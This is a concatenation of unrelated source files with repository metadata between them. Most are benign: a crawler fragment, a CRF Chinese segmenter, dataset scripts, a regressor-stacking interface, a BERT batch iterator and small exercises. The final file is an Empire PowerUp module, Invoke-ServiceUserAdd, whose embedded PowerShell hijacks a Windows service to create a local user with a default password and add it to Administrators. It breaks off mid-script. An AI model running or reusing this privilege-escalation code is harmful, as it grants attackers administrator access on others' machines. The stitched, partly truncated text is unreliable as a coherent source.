title = bsObj.find(attrs={'class':'article-title'}).text
content = content.replace("\n", "").replace("\r", "").replace(" ", "").replace("\t", "").replace("\xa0", "").replace('\u3000','')
# print('title: ' + title + ' content: ' + content)
item = AntfinItem()
item['type'] = 2
item['url'] = response.meta['url']
item['title'] = title.replace('\n', '').replace("\r", "").replace(" ", "").replace("\t", "").replace("\xa0", "").replace('\u3000','')
item['summary'] = content[:60]
item['content'] = content
item['vendor'] = ''
return item
|
[
"btxu@scut.edu.cn"
] |
btxu@scut.edu.cn
|
d356594c618e74947371466d15cb34018a2b1020
|
50ac1dca3fac05f4d9393194190a754ff43a67d8
|
/deepnlp/segmenter.py
|
f82688200b9334cc4aaebdba3aace2ec1db10d29
|
[
"MIT"
] |
permissive
|
sweetcard/deepnlp
|
304a9716fbc6453328d4ede3f2a61948805cb0f1
|
a1d686756542a48cd6661bba0637448d9cfa46dd
|
refs/heads/master
| 2021-09-16T08:36:39.119709
| 2017-12-24T13:54:13
| 2017-12-24T13:54:13
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,354
|
py
|
#!/usr/bin/python
# -*- coding:utf-8 -*-
# B, M, E, S: Beginning, Middle, End, Single 4 tags
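# e.g. the characters of a sentence tagged  我/S 爱/S 北/B 京/E  are grouped
# into the words ["我", "爱", "北京"] (illustrative example added here)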
import sys,os
import CRFPP
from model_util import registered_models
# linear chain CRF model path, need str input, convert unicode to str in python2, <str> object in python3
pkg_path = os.path.dirname(os.path.abspath(__file__))
version_info = "py3" if (sys.version_info>(3,0)) else "py2"
DEFAULT_MODEL = str(os.path.join(pkg_path, "segment/models/zh/crf_model"))
class Tokenizer(object):
def __init__(self, model_path = DEFAULT_MODEL):
self.model = CRFPP.Tagger("-m " + model_path)
def seg(self, text):
'''
text: String, text to be segmented;
model: path of pretrained CRFPP model,
'''
segList = []
model = self.model
model.clear()
for char in text.strip(): # char in String
char = char.strip()
if char:
input_char = (char + "\to\tB").encode('utf-8') if (version_info == "py2") else (char + "\to\tB")
model.add(input_char)
model.parse()
size = model.size()
xsize = model.xsize()
word = ""
for i in range(0, size):
for j in range(0, xsize):
char = model.x(i, j).decode('utf-8') if (version_info == "py2") else model.x(i, j)
tag = model.y2(i)
if tag == 'B':
word = char
elif tag == 'M':
word += char
elif tag == 'E':
word += char
segList.append(word)
word = ""
else: # tag == 'S'
word = char
segList.append(word)
word = ""
return segList
def load_model(name = 'zh'):
''' model_path e.g.: ./segment/models/zh/crf_model
Loads pretrained subfield models...
'''
registered_model_list = registered_models[0]['segment']
if name not in registered_model_list:
print ("WARNING: Input model name '%s' is not registered..." % name)
print ("WARNING: Please register the name in model_util.registered_models...")
return None
model_path = str(os.path.join(pkg_path, "segment/models/", name, "crf_model"))
if os.path.exists(model_path):
print ("NOTICE: Loading model from below path %s..." % model_path)
return Tokenizer(model_path)
else:
print ("WARNING: Input model path %s doesn't exist ..." % model_path)
print ("WARNING: Please download model file using method: deepnlp.download(module='%s', name='%s')" % ('segment', name))
print ("WARNING: Loading default model %s..." % DEFAULT_MODEL)
return Tokenizer(DEFAULT_MODEL)
def load_user_model(model_path):
''' model_path e.g.: ./segment/models/zh/crf_model
'''
if os.path.exists(model_path):
print ("NOTICE: Loading model from below path %s..." % model_path)
return Tokenizer(model_path)
else:
print ("WARNING: Input model path %s doesn't exist, please download model file using deepnlp.download() method" % name)
print ("WARNING: Loading default model %s..." % DEFAULT_MODEL)
return Tokenizer(DEFAULT_MODEL)
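# A minimal usage sketch (illustrative addition; assumes CRFPP and the 'zh'
# model file are available as described in the warnings above):
# tokenizer = load_model('zh')
# print(tokenizer.seg('我爱北京'))   # e.g. -> ['我', '爱', '北京']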
|
[
"dingo0927@126.com"
] |
dingo0927@126.com
|
7007b978bc359c69f951596544dccbf0805e60a6
|
bfbdbb98f7d81a67fb31ef0c50d97e469a08e7c6
|
/youcook2_object_detection.py
|
68fd4206eb6065539d6a8ddeeb32b42d184b94d8
|
[] |
no_license
|
carinasilberer/cooking-procedural-extraction
|
063c758e45c75b56c0dc6be7c3db5fdd5863a3c8
|
9f2f6d841e02e62a0e66227ffb8c0ca188ec0d17
|
refs/heads/master
| 2022-05-29T02:39:02.209343
| 2020-05-02T00:49:22
| 2020-05-02T00:49:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,008
|
py
|
import csv
import json
youtube_ids = set()
with open("youcook2/reviewed_0812.csv", newline='', encoding='utf-8') as gt_f:
reader = csv.DictReader(gt_f)
for row in reader:
youtube_id = row['VideoUrl'].split('?v=')[1]
youtube_ids.add(youtube_id)
with open("youcook2/youtube_ids.txt", 'w', encoding='utf-8') as id_f:
for idx in youtube_ids:
id_f.write(idx+"\n")
total_ids = len(youtube_ids)
print("Total vids: ", total_ids)
val_count = 0
with open("youcook2/yc2_bb/yc2_bb_val_annotations.json", encoding="utf-8") as val_f:
vals = json.load(val_f)
for k in vals["database"]:
if k in youtube_ids:
val_count += 1
print("Val in ours: ", val_count)
test_count = 0
with open("youcook2/yc2_bb/yc2_bb_public_test_annotations.json", encoding="utf-8") as test_f:
tests = json.load(test_f)
for k in tests["database"]:
if k in youtube_ids:
test_count += 1
print("Test in ours: ", test_count)
|
[
"frankxu2004@gmail.com"
] |
frankxu2004@gmail.com
|
b577c919bd24c36261d64999050c5fc6ea965dd9
|
bcdc23c9d3cc89279c57faaa59b9b63596edbbc8
|
/day9/sol2.py
|
b99a29b151c3b2a7af8fdf639b20e9886eb744bd
|
[] |
no_license
|
AntoineTheb/adventofcode2020
|
f6924db4537fd3cddf16737664ddf74a4e8bfba8
|
223622438f15828b26996591e9298948ce069b2e
|
refs/heads/master
| 2023-02-04T06:14:13.535984
| 2020-12-22T01:27:38
| 2020-12-22T01:27:38
| 322,895,128
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,022
|
py
|
from itertools import combinations
import numpy as np
def main():
data = np.loadtxt('input.txt', dtype=int)  # np.int is deprecated; plain int behaves the same
valid = True
pre_beg = 0
pre_end = 25
while valid:
preample = data[pre_beg:pre_end]
is_valid = False
for one, two in combinations(preample, 2):
if one + two == data[pre_end]:
is_valid = True
break
valid = is_valid
pre_beg += 1
pre_end += 1
weakness = data[pre_end-1]
print('Found weakness: {}'.format(weakness))
print('Generating sublists ..')
# from https://stackoverflow.com/a/47101915
def all_sublists(L):
for w in range(1, len(L)+1):
for i in range(len(L)-w+1):
yield L[i:i+w]
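# Illustrative note (added): every contiguous window, shortest first, e.g.
# list(all_sublists([1, 2, 3])) gives [1], [2], [3], [1, 2], [2, 3], [1, 2, 3]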
print('Got sublists ..')
print('Verifying additions')
for sub in all_sublists(data[:pre_end-1]):
# print(sub, end="\r")
if sum(sub) == weakness:
print(min(sub) + max(sub))
if __name__ == "__main__":
main()
|
[
"theberge.antoine.cem@gmail.com"
] |
theberge.antoine.cem@gmail.com
|
57130ac2be6a80dc5a76960b28cfb18ecdd11fed
|
ef6de6fd1d4e8e9858aecb287dd23dc520aec136
|
/physlearn/supervised/interface.py
|
e000cadbcfddf4ea806c973e3078d20cf8a1fc9e
|
[
"MIT"
] |
permissive
|
tesseract-42/scikit-physlearn
|
bd625b1d1d7b2cfaed6ba3a586def97e5bb1bd99
|
80410feafb27f99f417b2b5d2282ebbb8fdbb642
|
refs/heads/master
| 2022-12-18T11:04:16.122912
| 2020-09-27T12:59:34
| 2020-09-27T12:59:34
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 12,605
|
py
|
"""
The :mod:`physlearn.supervised.interface` provides an interface object, which
abstracts regressors and enables their amalgamation into a unified regressor
object. It includes the :class:`physlearn.RegressorDictionaryInterface` class.
"""
# Author: Alex Wozniakowski
# License: MIT
import os
import joblib
import mlxtend.regressor
import sklearn.ensemble
from physlearn.base import AbstractEstimatorDictionaryInterface
from physlearn.supervised.utils._definition import _REGRESSOR_DICT
class RegressorDictionaryInterface(AbstractEstimatorDictionaryInterface):
"""BaseRegressor and regressor dictionary interface.
This interface enables the regressor abstraction, which amalgamates
regressors from
`Scikit-learn <https://scikit-learn.org/>`_,
`LightGBM <https://lightgbm.readthedocs.io/en/latest/index.html>`_,
`XGBoost <https://xgboost.readthedocs.io/en/latest/>`_,
`CatBoost <https://catboost.ai/>`_,
and `Mlxtend <http://rasbt.github.io/mlxtend/>`_ into a unified framework.
It links the :class:`physlearn.supervised.regression.BaseRegressor` and
the regressor dictionary, which contains the regressor classes.
Parameters
----------
regressor_choice : str
The dictionary key for lookup in the dictionary of regressors.
The key must be in lower case letter, e.g., the Scikit-learn
regressor Ridge has key ``'ridge'``.
params : dict, list, or None, optional (default=None)
The choice of (hyper)parameters.
stacking_options : dict or None, optional (default=None)
A dictionary of stacking options, whereby ``layers``
must be specified:
layers :obj:`dict`
A dictionary of stacking layer(s).
shuffle :obj:`bool` or None, (default=True)
Determines whether to shuffle the training data in
:class:`mlxtend.regressor.StackingCVRegressor`.
refit :obj:`bool` or None, (default=True)
Determines whether to clone and refit the regressors in
:class:`mlxtend.regressor.StackingCVRegressor`.
passthrough :obj:`bool` or None, (default=True)
Determines whether to concatenate the original features with
the first stacking layer predictions in
:class:`sklearn.ensemble.StackingRegressor`,
:class:`mlxtend.regressor.StackingRegressor`, or
:class:`mlxtend.regressor.StackingCVRegressor`.
meta_features : :obj:`bool` or None, (default=True)
Determines whether to make the concatenated features
accessible through the attribute ``train_meta_features_``
in :class:`mlxtend.regressor.StackingRegressor` and
:class:`mlxtend.regressor.StackingCVRegressor`.
voting_weights : :obj:`ndarray` of shape (n_regressors,) or None, (default=None)
Sequence of weights for :class:`sklearn.ensemble.VotingRegressor`.
"""
def __init__(self, regressor_choice: str, params=None,
stacking_options=None):
self.regressor_choice = regressor_choice
self.params = params
self.stacking_options = stacking_options
def get_params(self, regressor):
"""
Retrieves the (hyper)parameters.
Parameters
----------
regressor : estimator
A regressor that follows the Scikit-learn API.
Notes
-----
The method :meth:`physlearn.RegressorDictionaryInterface.set_params`
must be called beforehand.
"""
if not hasattr(self, '_set_params'):
raise AttributeError('In order to retrieve the (hyper)parameters '
'call set_params beforehand.')
else:
return regressor.get_params()
def set_params(self, **kwargs):
"""Sets the (hyper)parameters.
If ``params`` is ``None``, then the default (hyper)parameters
are utilized.
Parameters
----------
cv : int, cross-validation generator, an iterable, or None
Determines the cross-validation strategy in
:class:`sklearn.ensemble.StackingRegressor`,
:class:`mlxtend.regressor.StackingRegressor`, or
:class:`mlxtend.regressor.StackingCVRegressor`.
verbose : int or None
Determines verbosity in
:class:`mlxtend.regressor.StackingRegressor` and
:class:`mlxtend.regressor.StackingCVRegressor`.
random_state : int, RandomState instance, or None
Determines the random number generation in
:class:`mlxtend.regressor.StackingCVRegressor`.
n_jobs : int or None
The number of jobs to run in parallel.
stacking_options : dict or None, optional (default=None)
A dictionary of stacking options, whereby ``layers``
must be specified:
layers :obj:`dict`
A dictionary of stacking layer(s).
shuffle :obj:`bool` or None, (default=True)
Determines whether to shuffle the training data in
:class:`mlxtend.regressor.StackingCVRegressor`.
refit :obj:`bool` or None, (default=True)
Determines whether to clone and refit the regressors in
:class:`mlxtend.regressor.StackingCVRegressor`.
passthrough :obj:`bool` or None, (default=True)
Determines whether to concatenate the original features with
the first stacking layer predictions in
:class:`sklearn.ensemble.StackingRegressor`,
:class:`mlxtend.regressor.StackingRegressor`, or
:class:`mlxtend.regressor.StackingCVRegressor`.
meta_features : :obj:`bool` or None, (default=True)
Determines whether to make the concatenated features
accessible through the attribute ``train_meta_features_``
in :class:`mlxtend.regressor.StackingRegressor` and
:class:`mlxtend.regressor.StackingCVRegressor`.
voting_weights : :obj:`ndarray` of shape (n_regressors,) or None, (default=None)
Sequence of weights for :class:`sklearn.ensemble.VotingRegressor`.
"""
cv = kwargs.pop('cv', None)
verbose = kwargs.pop('verbose', None)
random_state = kwargs.pop('random_state', None)
n_jobs = kwargs.pop('n_jobs', None)
stacking_options = kwargs.pop('stacking_options', None)
if isinstance(stacking_options, dict):
# Check if the user specified the
# various stacking options and set
# the default behavior if unspecified.
if 'layers' not in stacking_options:
raise KeyError('The layers key is necessary for stacking. '
'Without its specification the stacking '
'layers are ambiguous.')
else:
layers = stacking_options['layers']
if 'shuffle' in stacking_options:
shuffle = stacking_options['shuffle']
else:
shuffle = True
if 'refit' in stacking_options:
refit = stacking_options['refit']
else:
refit = True
if 'passthrough' in stacking_options:
passthrough = stacking_options['passthrough']
else:
passthrough = True
if 'meta_features' in stacking_options:
meta_features = stacking_options['meta_features']
else:
meta_features = True
if 'voting_weights' in stacking_options:
voting_weights = stacking_options['voting_weights']
else:
voting_weights = None
if kwargs:
raise TypeError('Unknown keyword arguments: %s'
% (list(kwargs.keys())[0]))
reg = {}
if self.params is not None:
if self.stacking_options is not None:
if any(self.regressor_choice == choice for choice in ['stackingregressor', 'votingregressor']):
reg['regressors'] = [(str(index), _REGRESSOR_DICT[choice]().set_params(
**self.params[0][index]))
for index, choice
in enumerate(layers['regressors'])]
else:
reg['regressors'] = [_REGRESSOR_DICT[choice]().set_params(
**self.params[0][index])
for index, choice
in enumerate(layers['regressors'])]
if self.regressor_choice != 'votingregressor':
reg['final_regressor'] = _REGRESSOR_DICT[layers['final_regressor']]().set_params(
**self.params[1])
else:
reg['regressor'] = _REGRESSOR_DICT[self.regressor_choice]().set_params(**self.params)
else:
# Retrieve default (hyper)parameters.
if self.stacking_options is not None:
if any(self.regressor_choice == choice for choice in ['stackingregressor', 'votingregressor']):
reg['regressors'] = [(str(index), _REGRESSOR_DICT[choice]())
for index, choice
in enumerate(layers['regressors'])]
else:
reg['regressors'] = [_REGRESSOR_DICT[choice]()
for choice
in layers['regressors']]
if self.regressor_choice != 'votingregressor':
reg['final_regressor'] = _REGRESSOR_DICT[layers['final_regressor']]()
else:
reg['regressor'] = _REGRESSOR_DICT[self.regressor_choice]()
if 'regressor' in reg:
out = reg['regressor']
elif 'regressors' in reg:
if 'final_regressor' in reg:
if self.regressor_choice == 'stackingregressor':
out = sklearn.ensemble.StackingRegressor(estimators=reg['regressors'],
final_estimator=reg['final_regressor'],
cv=cv,
n_jobs=n_jobs,
passthrough=passthrough)
elif self.regressor_choice == 'mlxtendstackingregressor':
out = mlxtend.regressor.StackingRegressor(regressors=reg['regressors'],
meta_regressor=reg['final_regressor'],
verbose=verbose,
use_features_in_secondary=passthrough,
store_train_meta_features=meta_features)
elif self.regressor_choice == 'mlxtendstackingcvregressor':
out = mlxtend.regressor.StackingCVRegressor(regressors=reg['regressors'],
meta_regressor=reg['final_regressor'],
cv=cv,
shuffle=shuffle,
random_state=random_state,
verbose=verbose,
refit=refit,
n_jobs=n_jobs,
use_features_in_secondary=passthrough,
store_train_meta_features=meta_features)
else:
out = sklearn.ensemble.VotingRegressor(estimators=reg['regressors'],
weights=voting_weights,
n_jobs=n_jobs)
# This attribute is used in get_params to check
# if the (hyper)parameters have been set.
setattr(self, '_set_params', True)
return out
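# A minimal usage sketch (illustrative addition; assumes 'ridge' is a
# registered key in _REGRESSOR_DICT, as for the Scikit-learn Ridge regressor):
# opts = {'layers': {'regressors': ['ridge', 'ridge'], 'final_regressor': 'ridge'}}
# interface = RegressorDictionaryInterface(regressor_choice='stackingregressor',
#                                          stacking_options=opts)
# reg = interface.set_params(stacking_options=opts)
# print(interface.get_params(reg))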
|
[
"wozn0001@e.ntu.edu.sg"
] |
wozn0001@e.ntu.edu.sg
|
6abbb912609a4b40bca9c48212659992ea448350
|
53f2a72afe6b638b2beea94f5514be8ab3921ee4
|
/env/bin/pip2.7
|
c72c1435b048e2baf6318281b1849115e25b81c1
|
[] |
no_license
|
bipinkh/FSUelectionManagementSystem
|
576336f2fbff46e137bd7ff76fe8df17c19fd9a9
|
013ac5f7f7475656876b471a52704d76f1d13d2b
|
refs/heads/master
| 2021-01-01T15:49:00.204030
| 2018-07-07T17:25:56
| 2018-07-07T17:25:56
| 97,708,797
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 272
|
7
|
#!/media/basanta/main/academics/FSUelectionManagementSystem/env/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from pip._internal import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"basanta83chaulagain@gmail.com"
] |
basanta83chaulagain@gmail.com
|
6adb6bf821f03dd5f10e7a2d72a0e6ad7598d8af
|
dbfbca14923d64eaa4b20ab13d3cda10db058047
|
/account/admin.py
|
dd0023d7dec4bab4a8a7005abf4e21cc974944fc
|
[] |
no_license
|
JoaoAlmeida-dev/quarantine
|
bb9c0c2d32d5bc33a5b1578e0f76c00f047a2641
|
f6b085cad409f31d0e73a3cdb75b90fcec2bfd19
|
refs/heads/master
| 2022-07-05T09:08:03.528702
| 2020-05-14T22:08:37
| 2020-05-14T22:08:37
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 478
|
py
|
from django.contrib import admin
from django.contrib.auth.admin import UserAdmin
from account.models import Account
# Register your models here.
class Accountadmin(UserAdmin):
list_display = ('email', 'username', 'date_joined', 'last_login', 'is_admin', 'is_staff')
search_fields = ('email', 'username')
readonly_fields = ('date_joined', 'last_login',)
filter_horizontal = ()
list_filter = ()
fieldsets = ()
admin.site.register(Account,Accountadmin)
|
[
"joao.ranger@gmail.com"
] |
joao.ranger@gmail.com
|
73f13181b3902224a6140ced6570792c42d580fe
|
80b6c944728ca61ddc477fa2bb9fa312e1c4c81d
|
/data_iterator.py
|
f663d0bdf8e2cf234139f572bb319a8613b16c98
|
[] |
no_license
|
LiveTowardTheSea/bert_model
|
c2f480cf4bdbec10ad7830584ca2d84f90345082
|
8ce207a8319bf53e064dacb7d574ff8f912e863a
|
refs/heads/master
| 2023-04-28T06:15:13.337520
| 2021-05-20T13:44:26
| 2021-05-20T13:44:26
| 369,202,848
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,040
|
py
|
#from numpy.lib.npyio import NpzFile
import torch
import codecs
# Iterator: given a dataset and vocab, yields torch tensors of shape (batch_size, seq_len), traversing the whole dataset
import numpy as np
from transformers import BertTokenizer
def generate_char_idx(batch_data, vocab):
"""
This operates on single chars, since only individual tokens are extracted.
:param batch_data: series-like data with two columns, either sentence or label
:param vocab: the vocab for sentences or for labels
:return: list of index lists
"""
idx = []
for sentence in batch_data:
each_idx = []
for token in sentence:
each_idx.append(vocab.stoi[token])
idx.append(each_idx)
return idx
def generate_pad_idx(idx_list, vocab):
"""
After the previous function, tokens have become sequences of indices, i.e. a
list of lists; what we do now is turn that list of lists into a tensor and pad it.
:param idx_list:
:param vocab: the vocab used for padding, which provides vocab.pad_idx
:return: a torch.tensor plus a mask derived from the pad positions
"""
max_len = max([len(each_idx_list) for each_idx_list in idx_list])
result = torch.zeros((len(idx_list), max_len), dtype=torch.long)
for i, sentence in enumerate(idx_list):
result[i] = torch.tensor(sentence + [vocab.pad_idx]*(max_len - len(sentence)), dtype=torch.long)
mask = (result == vocab.pad_idx)
return result, mask
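# Illustrative example (added; assumes vocab.pad_idx == 0):
# generate_pad_idx([[5, 6, 7], [8]], vocab) would return
# tensor([[5, 6, 7], [8, 0, 0]]) and the mask tensor([[False, False, False], [False, True, True]])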
def read_data(data_path):
data_list = []
with codecs.open(data_path, 'r', 'utf-8') as f:
sentence_list = []
tag_list = []
for line in f.readlines():
if line not in ['\n', '\r\n']:
word_label = line.strip().split()
if len(word_label) >= 2:
sentence_list.append(word_label[0])
tag_list.append(word_label[1])
else:
if len(sentence_list)>0 and len(tag_list)>0 and len(sentence_list)==len(tag_list):
data_list.append((sentence_list, tag_list))
sentence_list = []
tag_list = []
return data_list
class data_iterator:
def __init__(self, data_path,char_vocab, tag_vocab, batch_size):
print("init iterator:", data_path)
self.data_list = read_data(data_path)
self.char_vocab = char_vocab
self.tag_vocab = tag_vocab
self.batch_size = batch_size
self.offset = 0
self.max_num = len(self.data_list) // batch_size + 1 if len(self.data_list) % batch_size != 0 else len(self.data_list) // batch_size
# Run the approximate bucket sort
self.appro_bucket_sort()
# Then shuffle at batch granularity so similar lengths share a batch while lengths differ across batches.
self.between_bucket_unsort()
# Roughly bucket-sort data_list so sentences of similar length sit together, reducing padding and processing time
def appro_bucket_sort(self):
"""
Roughly bucket-sorts the data by element length.
:param sent_tag_list: data list whose elements are (sentence, tags) tuples
"""
# First, collect every sentence length into a list
gap_len = 32
length_list = []
for sent,tag in self.data_list:
length_list.append(len(sent))
# Next, get the maximum and minimum sentence lengths.
max_bucket_num = max(length_list) // gap_len
min_bucket_num = min(length_list) // gap_len
# Total number of buckets
total_bucket = max_bucket_num - min_bucket_num + 1
# Each bucket stores sentence indices
sentence_2_bucket = [[] for i in range(total_bucket)]
for i,sent_len in enumerate(length_list):
# Decide which bucket this sentence goes into (bucket list index)
bucket_idx = sent_len // gap_len - min_bucket_num
sentence_2_bucket[bucket_idx].append(i)
# First, flatten sentence_2_bucket
sentence_2_bucket = [sent_idx for bucket in sentence_2_bucket for sent_idx in bucket]
# Reorder sent_tag_list according to the order in sentence_2_bucket
orig_2_bucket= [sentence_2_bucket.index(orig_idx) for orig_idx in range(len(self.data_list))]
new_sentence_tag_list = [x for _,x in sorted(zip(orig_2_bucket,self.data_list))]
self.data_list = new_sentence_tag_list
# The function above puts sentences of similar length next to each other,
# but then training would see short sentences first and long ones later, which is clearly unacceptable.
def between_bucket_unsort(self):
data_len = len(self.data_list)
# Position i holds the batch_idx of the original data placed there
new_batch_idx = np.arange(0, (data_len-1)//self.batch_size + 1)
np.random.shuffle(new_batch_idx)
new_data_list = []
for batch_idx in new_batch_idx:
end_pos = min((batch_idx+1) * self.batch_size,data_len)
new_data_list += self.data_list[batch_idx * self.batch_size: end_pos]
self.data_list = new_data_list
def reset_iter(self):
self.offset = 0
        # reshuffle the data
np.random.shuffle(self.data_list)
        # re-bucket
self.appro_bucket_sort()
        # reshuffle the batch order
self.between_bucket_unsort()
def next(self):
if self.offset == self.max_num:
raise StopIteration
next_idx = (self.offset + 1) * self.batch_size if self.offset != self.max_num - 1 else len(self.data_list)
sentence_tag_data = self.data_list[self.offset * self.batch_size: next_idx]
self.offset += 1
sentence_data = []
tag_data = []
for sentence, tag in sentence_tag_data:
sentence_data.append(''.join(sentence))
tag_data.append(tag)
        # sentence_data is a list of str
sentence_tensor = []
sentence_mask = []
max_pad_len = len(max(sentence_data, key=len, default=''))+2
for sent in sentence_data:
encoded_result = self.char_vocab.encode_plus(sent,add_special_tokens=True,
max_length=max_pad_len,pad_to_max_length=True,return_attention_mask=True,return_tensors='pt')
#print(self.char_vocab.tokenize(sent))
#print('Token IDs: ', self.char_vocab.convert_tokens_to_ids(self.char_vocab.tokenize(sent)))
sent_tensor = encoded_result['input_ids']
sent_mask = encoded_result['attention_mask']
sentence_tensor.append(sent_tensor)
sentence_mask.append(sent_mask)
sentence_tensor = torch.cat(sentence_tensor,dim=0)
sentence_mask = torch.cat(sentence_mask,dim=0)
tag_idx = generate_char_idx(tag_data, self.tag_vocab)
tag_tensor, tag_mask = generate_pad_idx(tag_idx, self.tag_vocab)
return sentence_tensor, sentence_mask, tag_tensor, tag_mask
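
# A minimal usage sketch (hypothetical paths and vocab objects): char_vocab is
# assumed to be a HuggingFace BertTokenizer, and tag_vocab any object exposing
# .stoi and .pad_idx as used above.
#
#   char_vocab = BertTokenizer.from_pretrained('bert-base-chinese')
#   it = data_iterator('train.txt', char_vocab, tag_vocab, batch_size=32)
#   for _ in range(it.max_num):
#       sent_ids, sent_mask, tag_ids, tag_mask = it.next()
#       ...  # feed the batch to the model
#   it.reset_iter()  # re-bucket and re-shuffle before the next epoch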
|
[
"3430582102@qq.com"
] |
3430582102@qq.com
|
6fce633f50677744167793b8f644b51c2f9d85b2
|
7d30d345759a6ec70b4181a7f9dc112397d3d3ad
|
/Problem Set 3/radiationExposure.py
|
a9088794e79665a564cf34f974a2959225f682b9
|
[] |
no_license
|
harmishlakhani/MITx-6.00.1x
|
9ac22c9a4443ce5eda6c94ab7f1e4f92bbfb3338
|
9ed1aa3b975e699615ad361e56cadef6ee66c05a
|
refs/heads/master
| 2021-01-24T06:31:04.275872
| 2015-07-01T14:24:40
| 2015-07-01T14:24:40
| 37,739,841
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 920
|
py
|
def radiationExposure(start, stop, step):
'''
Computes and returns the amount of radiation exposed
to between the start and stop times. Calls the
function f (defined for you in the grading script)
to obtain the value of the function at any point.
start: integer, the time at which exposure begins
stop: integer, the time at which exposure ends
step: float, the width of each rectangle. You can assume that
the step size will always partition the space evenly.
returns: float, the amount of radiation exposed to
between start and stop times.
'''
# FILL IN YOUR CODE HERE...
radExposed = 0
i = start
while i < stop:
radExposed = radExposed + (step * f(i))
i = i + step
return radExposed
def f(x):
import math
return 10*math.e**(math.log(0.5)/5.27 * x)
print radiationExposure(0, 5, 1)
|
[
"harmish.lakhani@gmail.com"
] |
harmish.lakhani@gmail.com
|
ad885a14bf054f0d4dc5d81e3cf1a2ed65c53263
|
fe3ecb9b1ddd8de17b8cc93209134f86cd9c4a6f
|
/3_Python/chap01_Basic/exams/exam02_2.py
|
787636d74c46ed833bca1e20bf8f70046918b125
|
[] |
no_license
|
nsh92/Bigdata-and-Machine-Learning-Education-at-ITWILL
|
d1a7292ee4865a3d0c664dd6ecf3afc0d6325847
|
3cb5661001597499178a2c85f4ccf70dcf0855d6
|
refs/heads/master
| 2022-11-21T23:10:51.421708
| 2020-07-23T12:49:11
| 2020-07-23T12:49:11
| 275,540,204
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 433
|
py
|
'''
step02 문제
'''
'''
문2) 화씨를 섭씨로 변환하는 프로그램을 작성하시오.
화씨온도 변수명 : ftemp
섭씨온도 변수명 : ctemp
온도변환 수식 = (화씨온도 - 32.0) * (5.0/9.0)
<<화면출력 결과>>
화씨온도 : 93
섭씨온도 = 33.888889
'''
ftemp = 93
ctemp = (ftemp - 32.0) * (5.0/9.0)
print("화씨온도 :", ftemp)
print("섭씨온도 =", format(ctemp, "2.6f"))
|
[
"totols1092@gmail.com"
] |
totols1092@gmail.com
|
c65d3b132fdaa6cb8659c14abd5137a8b32c7c77
|
de697c595e68366e6fe9e6ae3ae150f354b8c250
|
/lib/modules/privesc/powerup/service_useradd.py
|
6cd6c686f8c7d7019afd2556810e49ab6b81fde6
|
[
"BSD-3-Clause"
] |
permissive
|
lockfale/Empire
|
b0515d5752d75e89870c9f735acd2aa6a86d3245
|
db1bc92296de4278b53df4129485cd9613332163
|
refs/heads/master
| 2021-01-16T19:22:35.456787
| 2015-08-09T05:58:05
| 2015-08-09T05:58:05
| 40,453,928
| 2
| 1
| null | 2015-08-09T23:21:09
| 2015-08-09T23:21:09
| null |
UTF-8
|
Python
| false
| false
| 8,575
|
py
|
from lib.common import helpers
class Module:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Invoke-ServiceUserAdd',
'Author': ['@harmj0y'],
'Description': ("Modifies a target service to create a local user and add it "
"to the local administrators."),
'Background' : True,
'OutputExtension' : None,
'NeedsAdmin' : False,
'OpsecSafe' : False,
'MinPSVersion' : '2',
'Comments': [
'https://github.com/Veil-Framework/PowerTools/tree/master/PowerUp'
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
'Description' : 'Agent to run module on.',
'Required' : True,
'Value' : ''
},
'ServiceName' : {
'Description' : "The service name to manipulate.",
'Required' : True,
'Value' : ''
},
'UserName' : {
'Description' : "The username to add.",
'Required' : False,
'Value' : 'john'
},
'Password' : {
'Description' : "Password to set for the added user.",
'Required' : False,
'Value' : 'Password123!'
},
'GroupName' : {
'Description' : "Local group to add the user to.",
'Required' : False,
'Value' : 'Administrators'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
script = """
function Invoke-ServiceUserAdd {
<#
.SYNOPSIS
Modifies a target service to create a local user and add it
to the local administrators.
.DESCRIPTION
This function stops a service, modifies it to create a user, starts
the service, stops it, modifies it to add the user to the specified group,
stops it, and then restores the original EXE path.
.PARAMETER ServiceName
The service name to manipulate. Required.
.PARAMETER UserName
The username to add. If not given, it defaults to "john"
.PARAMETER Password
The password to set for the added user. If not given, it defaults to "Password123!"
.PARAMETER GroupName
Group to add the user to (default of Administrators)
.OUTPUTS
System.bool. The user/password created if successful, false otherwise.
.EXAMPLE
> Invoke-ServiceUserAdd -ServiceName VulnSVC
Abuses service 'VulnSVC' to add a localuser "john" with password
"Password123! to the machine and local administrator group
.EXAMPLE
> Invoke-ServiceUserAdd -ServiceName VulnSVC -UserName backdoor -Password password -GroupName "Power Users"
Abuses service 'VulnSVC' to add a localuser "backdoor" with password
"password" to the machine and local "Power Users" group
#>
[CmdletBinding()]
Param (
[Parameter(Mandatory = $True)] [string]$ServiceName,
[string]$UserName = "john",
[string]$Password = "Password123!",
[string]$GroupName = "Administrators"
)
# query WMI for the service
$TargetService = gwmi win32_service -Filter "Name='$ServiceName'" | ?{$_}
# make sure we got a result back
if ($TargetService){
try{
            # try to enable the service if it was disabled
$RestoreDisabled = $false
if ($TargetService.StartMode -eq "Disabled"){
Write-Verbose "Service '$ServiceName' disabled, enabling..."
$result = sc.exe config $($TargetService.Name) start= demand
if ($result -contains "Access is denied."){
Write-Warning "[!] Access to service $($TargetService.Name) denied"
return $false
}
$RestoreDisabled = $true
}
# extract the original path and state so we can restore it later
$OriginalPath = $TargetService.PathName
$OriginalState = $TargetService.State
